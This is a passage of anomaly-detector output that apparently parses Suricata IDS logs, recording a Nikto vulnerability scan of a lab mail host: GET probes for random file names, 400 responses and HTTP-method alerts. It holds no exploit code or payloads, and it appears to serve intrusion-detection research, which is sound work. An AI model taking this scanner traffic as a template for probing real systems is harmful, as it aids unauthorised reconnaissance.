"\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.render_css\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo/fileinfo_str": "\",\"fileinfo\":{", "/parser/model/event_type/fileinfo/fileinfo/filename": "\"filename\":\"\\/bISn4adA.render_css\",", "/parser/model/event_type/fileinfo/fileinfo/state_str": "\"state\":\"", "/parser/model/event_type/fileinfo/fileinfo/state": "CLOSED", "/parser/model/event_type/fileinfo/fileinfo/stored_str": "\",\"stored\":", "/parser/model/event_type/fileinfo/fileinfo/stored": 1, "/parser/model/event_type/fileinfo/fileinfo/size_str": ",\"size\":", "/parser/model/event_type/fileinfo/fileinfo/size": 226, "/parser/model/event_type/fileinfo/fileinfo/tx_id_str": ",\"tx_id\":", "/parser/model/event_type/fileinfo/fileinfo/tx_id": 0, "/parser/model/event_type/fileinfo/fileinfo/brack_str": "}}", "/parser/model/event_type/fileinfo/fileinfo/filename/filename": "\"filename\":\"\\/bISn4adA.render_css\",", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename_str": "\"filename\":\"", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename": "\\/bISn4adA.render_css", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/quote_str": "\",", "/parser/model/event_type/fileinfo/http/hostname_str": ",\"http\":{\"hostname\":\"", "/parser/model/event_type/fileinfo/http/hostname": "mail.cup.com", "/parser/model/event_type/fileinfo/http/url_str": "\",\"url\":\"", "/parser/model/event_type/fileinfo/http/url": "\\/bISn4adA.render_css", "/parser/model/event_type/fileinfo/http/http_user_agent_str": "\",\"http_user_agent\":\"", "/parser/model/event_type/fileinfo/http/http_user_agent": "Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)", "/parser/model/event_type/fileinfo/http/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/http_refer": null, "/parser/model/event_type/fileinfo/http/http_method_str": "\",\"http_method\":\"", "/parser/model/event_type/fileinfo/http/http_method": "GET", "/parser/model/event_type/fileinfo/http/protocol_str": "\",\"protocol\":\"", "/parser/model/event_type/fileinfo/http/protocol": "HTTP\\/1.1", "/parser/model/event_type/fileinfo/http/quote_str": "\"", "/parser/model/event_type/fileinfo/http/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/redirect": null, "/parser/model/event_type/fileinfo/http/length_str": ",\"length\":", "/parser/model/event_type/fileinfo/http/length": 226, "/parser/model/event_type/fileinfo/http/brack_str": "}", "/parser/model/event_type/fileinfo/http/status/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/status/status/status_str": ",\"status\":", "/parser/model/event_type/fileinfo/http/status/status/status": 400, "/parser/model/event_type/fileinfo/http/content_type/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type_str": "\",\"http_content_type\":\"", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type": "text\\/html", "/parser/model/event_type/fileinfo/conn/src_ip_str": "\"src_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4": "192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46874,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_ip": 3232238234, "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port_str": "\",\"src_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port": 80, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip_str": ",\"dest_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip": 3232238318, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port_str": "\",\"dest_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port": 46874, "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto_str": ",\"proto\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto": "TCP", "/parser/model/event_type/fileinfo/conn/ip/ipv4/quote": "\"", "/parser/model/in_iface/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/in_iface/in_iface/in_iface_str": "\"in_iface\":\"", "/parser/model/in_iface/in_iface/in_iface": "eth0", "/parser/model/in_iface/in_iface/comma_str": "\",", "/parser/model/flow_id/flow_id": "\"flow_id\":1200378918664871,", "/parser/model/flow_id/flow_id/flow_id_str": "\"flow_id\":", "/parser/model/flow_id/flow_id/flow_id": 1200378918664871, "/parser/model/flow_id/flow_id/comma_str": "," } }, "LogData": { "RawLogData": [ "{\"timestamp\":\"2020-03-04T19:18:34.261544+0000\",\"flow_id\":1200378918664871,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46874,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.render_css\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.render_css\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}" ], "Timestamps": [ 1583349514.26 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 9, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata err message", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_err", "AffectedLogAtomPaths": [ "/parser/model/message", "/parser/model/classification", "/parser/model/priority" ], "AffectedLogAtomValues": [ "SURICATA HTTP METHOD terminated by non-compliant character", "Generic Protocol Command Decode", 3 ], "ParsedLogAtom": { "/parser/model": "03/04/2020-19:18:34.263653 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46876 -> 192.168.10.154:80", "/parser/model/time": 1583349514.263653, "/parser/model/brack_str1": "] {", "/parser/model/id1": 1, "/parser/model/sep1": ":", "/parser/model/id2": 2221030, "/parser/model/sep2": ":", "/parser/model/id3": 1, "/parser/model/sep3": "] ", "/parser/model/message": "SURICATA HTTP METHOD terminated by non-compliant character", "/parser/model/classficiation_str": " [**] [Classification: ", "/parser/model/classification": "Generic Protocol Command Decode", "/parser/model/priority_str": "] [Priority: ", "/parser/model/priority": 3, "/parser/model/conn": "TCP", "/parser/model/brack_str2": "} ", "/parser/model/src_ip": 3232238318, "/parser/model/colon": ":", "/parser/model/src_port": 46876, "/parser/model/arrow_str": " -> ", "/parser/model/dst_ip": 3232238234, "/parser/model/dst_port": 80 } }, "LogData": { "RawLogData": [ "03/04/2020-19:18:34.263653 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46876 -> 192.168.10.154:80" ], "Timestamps": [ 1583349514.26 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 11, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata fileinfo", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_fileinfo", "AffectedLogAtomPaths": [ "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename", "/parser/model/event_type/fileinfo/fileinfo/state", "/parser/model/event_type/fileinfo/fileinfo/stored" ], "AffectedLogAtomValues": [ "\\/bISn4adA.*", "CLOSED", 1 ], "ParsedLogAtom": { "/parser/model": "{\"timestamp\":\"2020-03-04T19:18:34.263864+0000\",\"flow_id\":486095792505167,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46876,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.*\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.*\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/time_str": "{\"timestamp\":\"", "/parser/model/time": 1583349514.263864, "/parser/model/plus_sign": "+", "/parser/model/tz": 0, "/parser/model/comma_str": "\",", "/parser/model/flow_id": "\"flow_id\":486095792505167,", "/parser/model/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/event_type_str": "\"event_type\":\"", "/parser/model/event_type/fileinfo": "fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46876,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.*\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.*\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo_str": "fileinfo\",", "/parser/model/event_type/fileinfo/conn": "\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46876,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/http": ",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.*\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226}", "/parser/model/event_type/fileinfo/app_proto_str": ",\"app_proto\":\"", "/parser/model/event_type/fileinfo/app_proto": "http", "/parser/model/event_type/fileinfo/fileinfo": "\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.*\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo/fileinfo_str": "\",\"fileinfo\":{", "/parser/model/event_type/fileinfo/fileinfo/filename": "\"filename\":\"\\/bISn4adA.*\",", "/parser/model/event_type/fileinfo/fileinfo/state_str": "\"state\":\"", "/parser/model/event_type/fileinfo/fileinfo/state": "CLOSED", "/parser/model/event_type/fileinfo/fileinfo/stored_str": "\",\"stored\":", "/parser/model/event_type/fileinfo/fileinfo/stored": 1, "/parser/model/event_type/fileinfo/fileinfo/size_str": ",\"size\":", "/parser/model/event_type/fileinfo/fileinfo/size": 226, "/parser/model/event_type/fileinfo/fileinfo/tx_id_str": ",\"tx_id\":", "/parser/model/event_type/fileinfo/fileinfo/tx_id": 0, "/parser/model/event_type/fileinfo/fileinfo/brack_str": "}}", "/parser/model/event_type/fileinfo/fileinfo/filename/filename": "\"filename\":\"\\/bISn4adA.*\",", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename_str": "\"filename\":\"", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename": "\\/bISn4adA.*", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/quote_str": "\",", "/parser/model/event_type/fileinfo/http/hostname_str": ",\"http\":{\"hostname\":\"", "/parser/model/event_type/fileinfo/http/hostname": "mail.cup.com", "/parser/model/event_type/fileinfo/http/url_str": "\",\"url\":\"", "/parser/model/event_type/fileinfo/http/url": "\\/bISn4adA.*", "/parser/model/event_type/fileinfo/http/http_user_agent_str": "\",\"http_user_agent\":\"", "/parser/model/event_type/fileinfo/http/http_user_agent": "Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)", "/parser/model/event_type/fileinfo/http/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/http_refer": null, "/parser/model/event_type/fileinfo/http/http_method_str": "\",\"http_method\":\"", "/parser/model/event_type/fileinfo/http/http_method": "GET", "/parser/model/event_type/fileinfo/http/protocol_str": "\",\"protocol\":\"", "/parser/model/event_type/fileinfo/http/protocol": "HTTP\\/1.1", "/parser/model/event_type/fileinfo/http/quote_str": "\"", "/parser/model/event_type/fileinfo/http/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/redirect": null, "/parser/model/event_type/fileinfo/http/length_str": ",\"length\":", "/parser/model/event_type/fileinfo/http/length": 226, "/parser/model/event_type/fileinfo/http/brack_str": "}", "/parser/model/event_type/fileinfo/http/status/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/status/status/status_str": ",\"status\":", "/parser/model/event_type/fileinfo/http/status/status/status": 400, "/parser/model/event_type/fileinfo/http/content_type/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type_str": "\",\"http_content_type\":\"", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type": "text\\/html", "/parser/model/event_type/fileinfo/conn/src_ip_str": "\"src_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4": "192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46876,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_ip": 3232238234, "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port_str": "\",\"src_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port": 80, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip_str": ",\"dest_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip": 3232238318, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port_str": "\",\"dest_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port": 46876, "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto_str": ",\"proto\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto": "TCP", "/parser/model/event_type/fileinfo/conn/ip/ipv4/quote": "\"", "/parser/model/in_iface/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/in_iface/in_iface/in_iface_str": "\"in_iface\":\"", "/parser/model/in_iface/in_iface/in_iface": "eth0", "/parser/model/in_iface/in_iface/comma_str": "\",", "/parser/model/flow_id/flow_id": "\"flow_id\":486095792505167,", "/parser/model/flow_id/flow_id/flow_id_str": "\"flow_id\":", "/parser/model/flow_id/flow_id/flow_id": 486095792505167, "/parser/model/flow_id/flow_id/comma_str": "," } }, "LogData": { "RawLogData": [ "{\"timestamp\":\"2020-03-04T19:18:34.263864+0000\",\"flow_id\":486095792505167,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46876,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.*\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.*\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}" ], "Timestamps": [ 1583349514.26 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 9, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata err message", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_err", "AffectedLogAtomPaths": [ "/parser/model/message", "/parser/model/classification", "/parser/model/priority" ], "AffectedLogAtomValues": [ "SURICATA HTTP METHOD terminated by non-compliant character", "Generic Protocol Command Decode", 3 ], "ParsedLogAtom": { "/parser/model": "03/04/2020-19:18:34.265515 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46878 -> 192.168.10.154:80", "/parser/model/time": 1583349514.265515, "/parser/model/brack_str1": "] {", "/parser/model/id1": 1, "/parser/model/sep1": ":", "/parser/model/id2": 2221030, "/parser/model/sep2": ":", "/parser/model/id3": 1, "/parser/model/sep3": "] ", "/parser/model/message": "SURICATA HTTP METHOD terminated by non-compliant character", "/parser/model/classficiation_str": " [**] [Classification: ", "/parser/model/classification": "Generic Protocol Command Decode", "/parser/model/priority_str": "] [Priority: ", "/parser/model/priority": 3, "/parser/model/conn": "TCP", "/parser/model/brack_str2": "} ", "/parser/model/src_ip": 3232238318, "/parser/model/colon": ":", "/parser/model/src_port": 46878, "/parser/model/arrow_str": " -> ", "/parser/model/dst_ip": 3232238234, "/parser/model/dst_port": 80 } }, "LogData": { "RawLogData": [ "03/04/2020-19:18:34.265515 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46878 -> 192.168.10.154:80" ], "Timestamps": [ 1583349514.27 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 11, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata fileinfo", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_fileinfo", "AffectedLogAtomPaths": [ "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename", "/parser/model/event_type/fileinfo/fileinfo/state", "/parser/model/event_type/fileinfo/fileinfo/stored" ], "AffectedLogAtomValues": [ "\\/bISn4adA.phpp", "CLOSED", 1 ], "ParsedLogAtom": { "/parser/model": "{\"timestamp\":\"2020-03-04T19:18:34.265852+0000\",\"flow_id\":1618846172187243,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46878,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.phpp\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.phpp\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/time_str": "{\"timestamp\":\"", "/parser/model/time": 1583349514.265852, "/parser/model/plus_sign": "+", "/parser/model/tz": 0, "/parser/model/comma_str": "\",", "/parser/model/flow_id": "\"flow_id\":1618846172187243,", "/parser/model/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/event_type_str": "\"event_type\":\"", "/parser/model/event_type/fileinfo": "fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46878,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.phpp\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.phpp\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo_str": "fileinfo\",", "/parser/model/event_type/fileinfo/conn": "\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46878,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/http": ",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.phpp\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226}", "/parser/model/event_type/fileinfo/app_proto_str": ",\"app_proto\":\"", "/parser/model/event_type/fileinfo/app_proto": "http", "/parser/model/event_type/fileinfo/fileinfo": "\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.phpp\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo/fileinfo_str": "\",\"fileinfo\":{", "/parser/model/event_type/fileinfo/fileinfo/filename": "\"filename\":\"\\/bISn4adA.phpp\",", "/parser/model/event_type/fileinfo/fileinfo/state_str": "\"state\":\"", "/parser/model/event_type/fileinfo/fileinfo/state": "CLOSED", "/parser/model/event_type/fileinfo/fileinfo/stored_str": "\",\"stored\":", "/parser/model/event_type/fileinfo/fileinfo/stored": 1, "/parser/model/event_type/fileinfo/fileinfo/size_str": ",\"size\":", "/parser/model/event_type/fileinfo/fileinfo/size": 226, "/parser/model/event_type/fileinfo/fileinfo/tx_id_str": ",\"tx_id\":", "/parser/model/event_type/fileinfo/fileinfo/tx_id": 0, "/parser/model/event_type/fileinfo/fileinfo/brack_str": "}}", "/parser/model/event_type/fileinfo/fileinfo/filename/filename": "\"filename\":\"\\/bISn4adA.phpp\",", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename_str": "\"filename\":\"", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename": "\\/bISn4adA.phpp", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/quote_str": "\",", "/parser/model/event_type/fileinfo/http/hostname_str": ",\"http\":{\"hostname\":\"", "/parser/model/event_type/fileinfo/http/hostname": "mail.cup.com", "/parser/model/event_type/fileinfo/http/url_str": "\",\"url\":\"", "/parser/model/event_type/fileinfo/http/url": "\\/bISn4adA.phpp", "/parser/model/event_type/fileinfo/http/http_user_agent_str": "\",\"http_user_agent\":\"", "/parser/model/event_type/fileinfo/http/http_user_agent": "Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)", "/parser/model/event_type/fileinfo/http/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/http_refer": null, "/parser/model/event_type/fileinfo/http/http_method_str": "\",\"http_method\":\"", "/parser/model/event_type/fileinfo/http/http_method": "GET", "/parser/model/event_type/fileinfo/http/protocol_str": "\",\"protocol\":\"", "/parser/model/event_type/fileinfo/http/protocol": "HTTP\\/1.1", "/parser/model/event_type/fileinfo/http/quote_str": "\"", "/parser/model/event_type/fileinfo/http/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/redirect": null, "/parser/model/event_type/fileinfo/http/length_str": ",\"length\":", "/parser/model/event_type/fileinfo/http/length": 226, "/parser/model/event_type/fileinfo/http/brack_str": "}", "/parser/model/event_type/fileinfo/http/status/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/status/status/status_str": ",\"status\":", "/parser/model/event_type/fileinfo/http/status/status/status": 400, "/parser/model/event_type/fileinfo/http/content_type/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type_str": "\",\"http_content_type\":\"", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type": "text\\/html", "/parser/model/event_type/fileinfo/conn/src_ip_str": "\"src_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4": "192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46878,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_ip": 3232238234, "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port_str": "\",\"src_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port": 80, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip_str": ",\"dest_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip": 3232238318, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port_str": "\",\"dest_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port": 46878, "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto_str": ",\"proto\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto": "TCP", "/parser/model/event_type/fileinfo/conn/ip/ipv4/quote": "\"", "/parser/model/in_iface/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/in_iface/in_iface/in_iface_str": "\"in_iface\":\"", "/parser/model/in_iface/in_iface/in_iface": "eth0", "/parser/model/in_iface/in_iface/comma_str": "\",", "/parser/model/flow_id/flow_id": "\"flow_id\":1618846172187243,", "/parser/model/flow_id/flow_id/flow_id_str": "\"flow_id\":", "/parser/model/flow_id/flow_id/flow_id": 1618846172187243, "/parser/model/flow_id/flow_id/comma_str": "," } }, "LogData": { "RawLogData": [ "{\"timestamp\":\"2020-03-04T19:18:34.265852+0000\",\"flow_id\":1618846172187243,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46878,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.phpp\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.phpp\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}" ], "Timestamps": [ 1583349514.27 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 9, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata err message", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_err", "AffectedLogAtomPaths": [ "/parser/model/message", "/parser/model/classification", "/parser/model/priority" ], "AffectedLogAtomValues": [ "SURICATA HTTP METHOD terminated by non-compliant character", "Generic Protocol Command Decode", 3 ], "ParsedLogAtom": { "/parser/model": "03/04/2020-19:18:34.268069 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46880 -> 192.168.10.154:80", "/parser/model/time": 1583349514.268069, "/parser/model/brack_str1": "] {", "/parser/model/id1": 1, "/parser/model/sep1": ":", "/parser/model/id2": 2221030, "/parser/model/sep2": ":", "/parser/model/id3": 1, "/parser/model/sep3": "] ", "/parser/model/message": "SURICATA HTTP METHOD terminated by non-compliant character", "/parser/model/classficiation_str": " [**] [Classification: ", "/parser/model/classification": "Generic Protocol Command Decode", "/parser/model/priority_str": "] [Priority: ", "/parser/model/priority": 3, "/parser/model/conn": "TCP", "/parser/model/brack_str2": "} ", "/parser/model/src_ip": 3232238318, "/parser/model/colon": ":", "/parser/model/src_port": 46880, "/parser/model/arrow_str": " -> ", "/parser/model/dst_ip": 3232238234, "/parser/model/dst_port": 80 } }, "LogData": { "RawLogData": [ "03/04/2020-19:18:34.268069 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46880 -> 192.168.10.154:80" ], "Timestamps": [ 1583349514.27 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 11, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata fileinfo", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_fileinfo", "AffectedLogAtomPaths": [ "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename", "/parser/model/event_type/fileinfo/fileinfo/state", "/parser/model/event_type/fileinfo/fileinfo/stored" ], "AffectedLogAtomValues": [ "\\/bISn4adA.nsconfig", "CLOSED", 1 ], "ParsedLogAtom": { "/parser/model": "{\"timestamp\":\"2020-03-04T19:18:34.268291+0000\",\"flow_id\":127685066625492,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46880,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.nsconfig\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.nsconfig\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/time_str": "{\"timestamp\":\"", "/parser/model/time": 1583349514.268291, "/parser/model/plus_sign": "+", "/parser/model/tz": 0, "/parser/model/comma_str": "\",", "/parser/model/flow_id": "\"flow_id\":127685066625492,", "/parser/model/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/event_type_str": "\"event_type\":\"", "/parser/model/event_type/fileinfo": 